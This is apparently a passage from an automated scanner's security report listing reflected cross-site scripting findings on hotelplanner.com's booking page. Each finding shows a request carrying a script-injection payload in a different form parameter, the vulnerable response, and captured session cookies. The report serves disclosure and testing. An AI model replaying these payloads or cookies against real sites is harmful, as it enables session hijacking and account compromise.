Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
M+%28%28GMT-05%3A00%29+Eastern+Time+%28US+%26+Canada%29%29+on+Oct+3%2C+2011+are+subject+to+a+1+Night+Room+%26+Tax+penalty.+The+property+makes+no+refunds+for+no+shows+or+early+checkouts.&hotelID=113791d8c46--><img%20src%3da%20onerror%3dalert(1)>07b9aa2c06b&HotelName=MILLENNIUM+BOSTONIAN+HOTEL+BOSTON&bookIt.x=100&bookIt.y=33

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:36:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
The value 113791d8c46--><img src=a onerror=alert(1)>07b9aa2c06b cannot be converted to a number. <br>
...[SNIP]...
4.298. https://www.hotelplanner.com/Accept/Reserve.cfm [hrnQuoteKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the hrnQuoteKey request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43004"><script>alert(1)</script>c625091ee21 was submitted in the hrnQuoteKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
ype=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f68495343004"><script>alert(1)</script>c625091ee21&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+understand+that+sometimes+plans+fall+through.+We+do+not+charge+a+change+or+cancel+fee.+However%2C+this+property+%28Millennium+Bostonian
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:20 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="hrnQuoteKey" value="9f715d9d-c49b-4dea-841d-bf8e7f68495343004"><script>alert(1)</script>c625091ee21">
...[SNIP]...
4.299. https://www.hotelplanner.com/Accept/Reserve.cfm [immediateChargeRequired parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the immediateChargeRequired request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1156"><script>alert(1)</script>2e6da93adbe was submitted in the immediateChargeRequired parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
mRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=trued1156"><script>alert(1)</script>2e6da93adbe&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescriptio
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:29 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="immediateChargeRequired" value="trued1156"><script>alert(1)</script>2e6da93adbe">
...[SNIP]...
4.300. https://www.hotelplanner.com/Accept/Reserve.cfm [locale parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the locale request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ad1"><script>alert(1)</script>bcab21e07d7 was submitted in the locale parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_USc9ad1"><script>alert(1)</script>bcab21e07d7&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:32:16 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="locale" value="en_USc9ad1"><script>alert(1)</script>bcab21e07d7">
...[SNIP]...
4.301. https://www.hotelplanner.com/Accept/Reserve.cfm [nativeCurrencyCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the nativeCurrencyCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2279f"><script>alert(1)</script>9b3ceb2908a was submitted in the nativeCurrencyCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD2279f"><script>alert(1)</script>9b3ceb2908a&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&d
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:34:12 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 59048

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="nativeCurrencyCode" value="USD2279f"><script>alert(1)</script>9b3ceb2908a">
...[SNIP]...
4.302. https://www.hotelplanner.com/Accept/Reserve.cfm [nativeRoomRate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the nativeRoomRate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4056c"><script>alert(1)</script>09a0685d1d3 was submitted in the nativeRoomRate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.24056c"><script>alert(1)</script>09a0685d1d3&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:34:08 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="nativeRoomRate" value="1434.24056c"><script>alert(1)</script>09a0685d1d3">
...[SNIP]...
4.303. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfAdults parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the numberOfAdults request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77570"><script>alert(1)</script>39a512bdb59 was submitted in the numberOfAdults parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=277570"><script>alert(1)</script>39a512bdb59&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPe
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:32:27 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58996

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<a href="http://www.HotelPlanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/4/2011&outDate=10/7/2011&NumRooms=1&NumBeds=&NumAdults=277570"><script>alert(1)</script>39a512bdb59&NumChildren=0#Avail">
...[SNIP]...
4.304. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfAdults parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the numberOfAdults request parameter is copied into the HTML document as plain text between tags. The payload 15138<script>alert(1)</script>561283b1b15 was submitted in the numberOfAdults parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=215138<script>alert(1)</script>561283b1b15&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPe
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:32:29 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<br>
                   Adults: 215138<script>alert(1)</script>561283b1b15&nbsp;&nbsp;Children: 0
                   <div align="right">
...[SNIP]...
4.305. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfChildren parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the numberOfChildren request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bb05"><script>alert(1)</script>d904716273c was submitted in the numberOfChildren parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=07bb05"><script>alert(1)</script>d904716273c&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeabl
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:32:38 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58996

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<a href="http://www.HotelPlanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/4/2011&outDate=10/7/2011&NumRooms=1&NumBeds=&NumAdults=2&NumChildren=07bb05"><script>alert(1)</script>d904716273c#Avail">
...[SNIP]...
4.306. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfChildren parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

